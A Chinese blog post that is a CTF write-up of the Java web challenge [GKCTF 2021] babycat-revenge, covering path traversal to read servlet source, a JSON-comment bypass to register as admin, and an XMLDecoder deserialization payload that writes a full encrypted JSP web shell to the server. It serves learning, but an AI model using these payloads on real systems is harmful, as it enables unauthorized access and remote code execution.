每日一题 [GKCTF 2021]babycat-revenge

最新推荐文章于 2023-06-25 10:00:46 发布
最新推荐文章于 2023-06-25 10:00:46 发布
阅读量779 收藏
点赞数
分类专栏: 每日一题 文章标签: java tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/121172715
版权

前言

一道java web,边学边做吧。

1

开局一个登录框,我最讨厌的东西,请添加图片描述
要登陆,那就先注册,SIGN UP,发现不允许,点进去后空白,看源码得到请添加图片描述
就算是我这种不懂的也知道这是一个接口,bp抓登陆的包,把login改成register

POST /register HTTP/1.1
Host: 94ace70a-9adf-4241-86d6-811f67d27ab0.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: http://94ace70a-9adf-4241-86d6-811f67d27ab0.node4.buuoj.cn:81
Connection: close
Referer: http://94ace70a-9adf-4241-86d6-811f67d27ab0.node4.buuoj.cn:81/
Cookie: JSESSIONID=11C6E5AFA74FC8976B94C879490E1E06

data={"username":"admin","password":"admin"}

这就注册了一个号进来了

请添加图片描述
接下来就是常规操作试试了,upload试试,提示我权限不够,不是admin,Download试试,下载了一个猫猫动态图,怀疑这里可能有任意文件读取,抓个包改参数,奈何太菜了读的方向不对,看wp,先读web.xml请添加图片描述

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <servlet>
    <servlet-name>register</servlet-name>
    <servlet-class>com.web.servlet.registerServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>login</servlet-name>
    <servlet-class>com.web.servlet.loginServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>home</servlet-name>
    <servlet-class>com.web.servlet.homeServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>upload</servlet-name>
    <servlet-class>com.web.servlet.uploadServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>download</servlet-name>
    <servlet-class>com.web.servlet.downloadServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>logout</servlet-name>
    <servlet-class>com.web.servlet.logoutServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>logout</servlet-name>
    <url-pattern>/logout</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>download</servlet-name>
    <url-pattern>/home/download</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>register</servlet-name>
    <url-pattern>/register</url-pattern>
  </servlet-mapping>
  <display-name>java</display-name>
  <servlet-mapping>
    <servlet-name>login</servlet-name>
    <url-pattern>/login</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>home</servlet-name>
    <url-pattern>/home</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>upload</servlet-name>
    <url-pattern>/home/upload</url-pattern>
  </servlet-mapping>

  <filter>
    <filter-name>loginFilter</filter-name>
    <filter-class>com.web.filter.LoginFilter</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>loginFilter</filter-name>
    <url-pattern>/home/*</url-pattern>
  </filter-mapping>
  <display-name>java</display-name>

  <welcome-file-list>
    <welcome-file>/WEB-INF/index.jsp</welcome-file>
  </welcome-file-list>
</web-app>

关于web.xml文件内容的详解点这里
其实关于该看哪些目录下的什么文件,只要你有一个java项目就比较清楚了
读…/…/WEB-INF/classes/com/web/servlet/registerServlet.class
正常打开肯定都是乱码,反编译一波,我直接在线网站了。得到

package com.web.servlet;

import com.google.gson.Gson;
import com.mysql.cj.util.StringUtils;
import com.web.dao.Person;
import com.web.dao.baseDao;
import java.io.IOException;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class registerServlet extends HttpServlet {

   protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
      resp.setContentType("text/html;charset=UTF-8");
      req.setAttribute("error", "<script>alert(\'Not Allowed\')</script>");
      req.getRequestDispatcher("WEB-INF/register.jsp").forward(req, resp);
   }

   protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
      resp.setCharacterEncoding("UTF-8");
      Integer res = Integer.valueOf(0);
      String role = "";
      Gson gson = new Gson();
      new Person();
      Connection connection = null;
      String var = req.getParameter("data").replaceAll(" ", "").replace("\'", "\"");
      Pattern pattern = Pattern.compile("\"role\":\"(.*?)\"");

      for(Matcher matcher = pattern.matcher(var); matcher.find(); role = matcher.group()) {
         ;
      }

      Person person;
      if(!StringUtils.isNullOrEmpty(role)) {
         var = var.replace(role, "\"role\":\"guest\"");
         person = (Person)gson.fromJson(var, Person.class);
      } else {
         person = (Person)gson.fromJson(var, Person.class);
         person.setRole("guest");
      }

      System.out.println(person);
      if(person.getUsername() == null || person.getPassword() == null) {
         resp.sendError(500, "鐢ㄦ埛鍚嶆垨瀵嗙爜涓嶈兘涓虹┖!");
      }

      person.setPic("/static/cat.gif");

      try {
         connection = baseDao.getConnection();
      } catch (Exception var17) {
         var17.printStackTrace();
      }

      if(connection != null) {
         String sql_query = "select * from ctf where username=?";
         Object[] params1 = new Object[]{person.getUsername()};

         try {
            ResultSet e = baseDao.execute(connection, sql_query, params1);
            if(e.next()) {
               System.out.println(e.next());
               resp.sendError(500, "user already exists!");
            } else {
               String sql = "insert into ctf (username,password,role,pic) values (?,?,?,?)";
               Object[] params2 = new Object[]{person.getUsername(), person.getPassword(), person.getRole(), person.getPic()};
               res = Integer.valueOf(baseDao.Update(connection, sql, params2));
            }
         } catch (SQLException var16) {
            var16.printStackTrace();
         }

         baseDao.closeResource(connection, (ResultSet)null, (PreparedStatement)null);
      }

      if(res.intValue() == 1) {
         resp.getWriter().write("register success!");
      }

   }
}

简单审下代码,前面哪些看不懂,看到replace我就来劲了,况且下面还有个role,毕竟要让自己变成admin才能上传文件才能进行下一步的操作,所以重点看这里

String var = req.getParameter("data").replaceAll(" ", "").replace("\'", "\"");
Pattern pattern = Pattern.compile("\"role\":\"(.*?)\"");

看不懂就搜一下,这属于是正则匹配,先接受data,也就是注册的时候看到的data{},下面还会循环效验,这里摘抄下别的师傅说的,我觉得说的很清楚:
正则表达式中包含了

"\"role\":\"(.*?)\""

会把所有内容进行完整匹配,但是JSON中的内联注释不会影响其解析,因此可以使用注释来破坏正则匹配,为了让其不直接走if的另外一个分支,我们还是需要让正则匹配有结果从而保证role变量有内容。JSON中键值一样的数据解析时后面的会覆盖前面的,因此可以构造如下payload

data={"username":"july", "password":"123456","role":"superuser", "role"/**/:"admin"}

可以注意到这里取得的正则匹配结果是最后一个,在可以使用注释的情况下,可以构造如下payload。

{"username":"sapphire","password":"admin","role":"admin"/*,"role":"guest"*/}

请添加图片描述

登陆成功~!admin权限,那么就可以upload了,再利用任意文件读取看看upload的代码

package com.web.servlet;

import com.web.dao.Person;
import com.web.util.tools;
import java.io.BufferedReader;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Iterator;
import java.util.List;
import javax.servlet.ServletException;
import javax.servlet.annotation.MultipartConfig;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;

@MultipartConfig
public class uploadServlet extends HttpServlet {

   protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
      String admin = "admin";
      Person user = (Person)req.getSession().getAttribute("user");
      System.out.println(user.getRole());
      if(!admin.equals(user.getRole())) {
         req.setAttribute("error", "<script>alert(\'admin only\');history.back(-1)</script>");
         req.getRequestDispatcher("../WEB-INF/error.jsp").forward(req, resp);
      } else {
         ArrayList fileNames = new ArrayList();
         tools.findFileList(new File(System.getenv("CATALINA_HOME") + "/webapps/ROOT/WEB-INF/upload/"), fileNames);
         req.setAttribute("files", fileNames);
         System.out.println(fileNames);
         req.getRequestDispatcher("../WEB-INF/upload.jsp").forward(req, resp);
      }

      req.getRequestDispatcher("../WEB-INF/upload.jsp").forward(req, resp);
   }

   protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
      String admin = "admin";
      Person user = (Person)req.getSession().getAttribute("user");
      System.out.println(user.getRole());
      if(!admin.equals(user.getRole())) {
         resp.sendRedirect("/home");
      } else {
         if(!ServletFileUpload.isMultipartContent(req)) {
            req.setAttribute("error", "<script>alert(\'something wrong\');history.back(-1)</script>");
            req.getRequestDispatcher("../WEB-INF/error.jsp").forward(req, resp);
         }

         DiskFileItemFactory factory = new DiskFileItemFactory();
         factory.setSizeThreshold(3145728);
         factory.setRepository(new File(System.getProperty("java.io.tmpdir")));
         ServletFileUpload upload = new ServletFileUpload(factory);
         upload.setFileSizeMax(41943040L);
         upload.setSizeMax(52428800L);
         String uploadPath = System.getenv("CATALINA_HOME") + "/webapps/ROOT/WEB-INF/upload/";

         try {
            List ex = upload.parseRequest(req);
            if(ex != null && ex.size() > 0) {
               Iterator var9 = ex.iterator();

               while(var9.hasNext()) {
                  FileItem item = (FileItem)var9.next();
                  if(!item.isFormField()) {
                     String fileName = item.getName();
                     String ext = fileName.substring(fileName.lastIndexOf(".")).replace(".", "");
                     String name = fileName.replace(ext, "");
                     if(!checkExt(ext) && !checkContent(item.getInputStream())) {
                        String filePath = uploadPath + File.separator + name + ext;
                        File storeFile = new File(filePath);
                        item.write(storeFile);
                        req.setAttribute("error", "upload success!");
                     } else {
                        req.setAttribute("error", "upload failed");
                        req.getRequestDispatcher("../WEB-INF/upload.jsp").forward(req, resp);
                     }
                  }
               }
            }
         } catch (Exception var16) {
            req.setAttribute("error", "<script>alert(\'something wrong\');history.back(-1)</script>");
         }

         req.getRequestDispatcher("../WEB-INF/upload.jsp").forward(req, resp);
      }
   }

   private static boolean checkExt(String ext) {
      boolean flag = false;
      String[] extWhiteList = new String[]{"jpg", "png", "gif", "bak", "properties", "xml", "html", "xhtml", "zip", "gz", "tar", "txt"};
      if(!Arrays.asList(extWhiteList).contains(ext.toLowerCase())) {
         flag = true;
      }

      return flag;
   }

   private static boolean checkContent(InputStream item) throws IOException {
      boolean flag = false;
      InputStreamReader input = new InputStreamReader(item);
      BufferedReader bf = new BufferedReader(input);
      String line = null;
      StringBuilder sb = new StringBuilder();

      while((line = bf.readLine()) != null) {
         sb.append(line);
      }

      String content = sb.toString();
      String[] blackList = new String[]{"Runtime", "exec", "ProcessBuilder", "jdbc", "autoCommit"};

      for(int i = 0; i < blackList.length; ++i) {
         if(content.contains(blackList[i])) {
            flag = true;
         }
      }

      return flag;
   }
}

以下为看wp
在baseDao里有这样一段代码

public static void getConfig() throws FileNotFoundException {
    HashMap map;
    Object obj = new XMLDecoder(new FileInputStream(System.getenv("CATALINA_HOME") + "/webapps/ROOT/WEB-INF/db/db.xml")).readObject();
    if ((obj instanceof HashMap) && (map = (HashMap) obj) != null && map.get("url") != null) {
        driver = (String) map.get("driver");
        url = (String) map.get("url");
        username = (String) map.get("username");
        password = (String) map.get("password");
    }
}

其中 System.getenv(“CATALINA_HOME”) 可以使用前面的文件包含读取 /proc/self/environ 得到为 /usr/local/tomcat。因此可以尝试将 db.xml 覆盖为恶意代码后使用注册业务触发 XMLDecoder 反序列化。上传业务中还对上传的内容执行了检测。

private static boolean checkContent(InputStream item) throws IOException {
        String[] blackList;
        boolean flag = false;
        BufferedReader bf = new BufferedReader(new InputStreamReader(item));
        StringBuilder sb = new StringBuilder();
        while (true) {
            String line = bf.readLine();
            if (line == null) {
                break;
            }
            sb.append(line);
        }
        String content = sb.toString();
        for (String str : new String[]{"Runtime", "exec", "ProcessBuilder", "jdbc", "autoCommit"}) {
            if (content.contains(str)) {
                flag = true;
            }
        }
        return flag;
    }
}

利用过程:随便传一个文件然后抓包修改如下:请添加图片描述
因为题目提示了PrintWriter,这里就用java.io.PrintWriter
先下载冰蝎。
payload这里有两种(或者说三种),反弹shell的我就不打上来了

<?xml version="1.0" encoding="UTF-8"?> 
<java version="1.8.0_192" class="java.beans.XMLDecoder"> 
<object class="java.io.PrintWriter"> 
<string>/usr/local/tomcat/webapps/ROOT/static/shell.jsp</string><void
method="println">
<string>
<![CDATA[<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>]]>
</string>
</void><void method="close"/>
</object>
</java> 

<?xml version="1.0" encoding="utf-8"?>
<java class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter">
        <string>/usr/local/tomcat/webapps/ROOT/static/shell.jsp</string>
        <void method="println">
            <string><![CDATA[冰蝎内shell.jsp的内容]]></string>
        </void>
        <void method="close"/>
    </object>
</java>

两种payload大同小异.
上传成功之后我们重新登录一次或者随便注册一个账号使得他触发漏洞,然后用冰蝎连接,密码默认为rebeyond,连上以后看到文件下有个readflag直接执行即可拿到flag
请添加图片描述
请添加图片描述

Sapphire037
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
计算机访问 用户密码不能为空,解决空密码账户无法访问Windows XP共享文件夹
weixin_35187410的博客
06-18 3880
1.检查guest账户是否开启XP默认情况下不开启guest账户,因此些为了其他人能浏览你的计算机,请启用guest账户。同时,为了安全请为guest设置密码或相应的权限。当然,也可以为每一台机器设置一个用户名和密码以便计算机之间的互相访问。2.检查是否拒绝Guest用户从网络访问本机当你开启了guest账户却还是根本不能访问时,请检查设置是否为拒绝guest从网络访问计算机,因为XP默认是不允许...
[GKCTF 2021]babycat-revenge
cjdgg的博客
11-17 2394
[GKCTF 2021]babycat-revenge 一进入题目界面如上所示,简简单单,没法注册,登录试了下弱口令还有注入都不是,也没有什么其他页面 找不到线索就抓个包来看看 好家伙,这个注册页面的注册代码露出来了,大概意思是得传入username和password才能注册,默认是不传值所以无法使用 这里源代码显示传值得传json数据,且得是POST方式 注册成功后登录 又看到了熟悉的上传功能和下载功能,这里先抓包看看下载功能 这个包这个下载的文件路径,不用多说也知道,任意文件读取吧 这里它已经
[GKCTF 2021]babycat
08-11 743
这道题点开始注册登录界面,但是点击注册按钮会提示Not Allowed。 但是查看源码会发现 这里是直接跳出了Not Allowed,构造POST请求,通过burp发包注册一个账号。 注册成功,登录后又上传和下载两个功能,我们发现下载有一个目录穿越,尝试读取,/WEB-INF/web.xml. 由于上传功能只有管理员可以使用它,因此可以根据xml的内容构造出, ../../WEB-INF/classes/com/web/servlet/registerServlet.class,...
CTF练习-Web1简单登录
weixin_43992606的博客
06-25 1314
CTF初入门小白,记录做题过程。
[WriteUp]GKCTF2021 babycat
feng的博客
09-03 560
前言 最近想找一点Java题做,看看CTF中的Java题都是什么样的,想到之前GKCTF里面有这么一道Java,存在非预期所以后来修复了,来做了一下学习学习。 非预期 进入环境发现有登录和注册的功能,看一下注册那里的f12知道了后端接收的方式和数据: <script type="text/javascript"> // var obj={}; // obj["username"]='test'; // obj["password"]='test'; // obj[
Bugku CTF Web bp & 社工-伪造
网安小趴菜
11-16 1269
Bugku CTF Web bp & 社工-伪造 wp
Quatros-Revenge
05-13
"Quatros-Revenge"正是这样一款完全使用JavaScript编写的太空射击游戏,它不依赖任何外部库,完全依靠原生JavaScript代码实现所有功能,充分展现了JavaScript在游戏开发中的潜力。 首先,让我们深入了解一下...
FTP-Revenge.rar_Same Same
09-23
Same as the name, use for Ftp revenge
藏经阁-Revenge of the maths mob Why l.pdf
最新发布
08-26
藏经阁-Revenge of the maths mob Why l.pdf
Endermans-Revenge:一个报告错误并为 Enderman's Revenge Modpack 提供建议的地方
06-26
Endermans-复仇 Enderman's Revenge 可以从 Feed The Beast 启动器下载,第三方包代码为“ER”。 这是一个报告错误并为 Enderman's Revenge Modpack 提供建议的地方。
chickeneo-voxel-revenge:主机无法播放,请检查DEVELOP
04-06
预览: : 关于一款基于treeJS的未完成的旧游戏,可追溯到2016年(旧名称: Block Dead )。 动作-roguelite-矩阵-x-鸡开始npm i && gulp 运行gulp gulp:dist到minifi文件和东西
babycat3.github.io
02-12
babycat3.github.io
[GKCTF2021]babycat
Y4tacker的博客
07-18 1219
文章目录写在前面babycat 写在前面 是Java没错了,冲它 babycat 发现接口直接post发包注册一个号登录进去 此时我们可以看见不管怎样role都是guest,后台只有管理员有上传权限 我们需要关注如何成为admin,但是文件下载那里可以目录穿越首先读取web.xml <web-app> <servlet> <servlet-name>register</servlet-name> <servlet-class&gt
php密码不能为空,PHPJN0001:phpmyadmin 允许密码为空 设置
weixin_39880318的博客
03-23 549
phpmyadmin连接mysql数据库,出于安全考虑,默认不允许使用空密码连接数据库。因为数据库一般都设置密码访问。但如果只是本机环境测试使用,每隔一段时间都需要填写密码,不是很方便。如果没有修改过配置,而使用空密码登入,phpmyadmin会返回错误提示:Login without a password is forbidden by configuration (see AllowNoPas...
[GKCTF 2021]RRRRsa
weixin_51867782的博客
07-08 2959
复现[GKCTF 2021]RRRRsa 拿到题目后,准备操作,额,,, 看了看大佬的wp,恍然大悟,分享一下解题的思路。(部分题目如下) 一般看到这种像hint1的式子,都需要用gcd(,n)去分解出q或p。推导过程如下(官方题解) 推导过程需要用到二项式定理和费马定理。原理如下: 1)二项式定理: 2)费马定理:a^p = a mod p; 了解原理后,在看题解就容易多了。总结了一下: 1)拿到两个式子后,先把括号去掉,然后把常数项去掉; 2)之后得到的式子应该是俩个只含p或q的式子,让两个式子的p(
[GKCTF2020]BabyDriver
weixin_47158947的博客
08-05 609
1.用ida打开, 上面什么失败成功就不说了,但是倒数第二行的好像之前做过的maze。。看看这个********** 真的是迷宫,而且只能有一种路径,要不然flag就不一样了。 __int64 __fastcall sub_140001380(__int64 a1, __int64 a2) { __int64 v2; // rbx __int64 v3; // rdi __int64 v4; // rax int v5; // ecx __int16 *v6; // rsi __in
GKCTF2021 部分复现
Je3Z的博客
06-28 846
misc 0.03 用VeraCrypt加载输入密码 311223313313112122312312313311 所以我们需要真正的密码 所以说 311223313313112122312312313311应该是有意义的部分 通过扫描NTFS得到了secre.txt存在数据流 用AlternateStreamView导出 想个密码表 而且题目里多次提到3所以考虑将那堆数据按3位一组进行拆分 311 223 313 313 112 122 312 312 313 311 所有其有两种情况 得出的密码
2021GKCTF X DASCTF应急挑战杯部分Writeup
克格莫
06-26 2370
1.签到 尝试了一波发现是16进制的base64编码,并且base64编码被反转了。 a = 'wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD' b='jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjM' c='t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt
Recommend a movie from the top global trending movies to me.
04-02
As an AI language model, I do not have access to real-time data to determine the top global trending movies. However, here are some movies that have recently received positive reviews and high ratings: 1. Nomadland (2020) - A film about a woman who becomes a modern-day nomad after losing everything in the Great Recession. 2. The Father (2020) - A drama about a man who struggles with memory loss as he tries to maintain his independence. 3. Sound of Metal (2019) - A drama about a heavy metal drummer who loses his hearing and must learn to adapt to a new way of life. 4. Minari (2020) - A family drama about a Korean-American family who moves to Arkansas to start a farm in the 1980s. 5. Promising Young Woman (2020) - A thriller about a woman seeking revenge against those who wronged her best friend.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值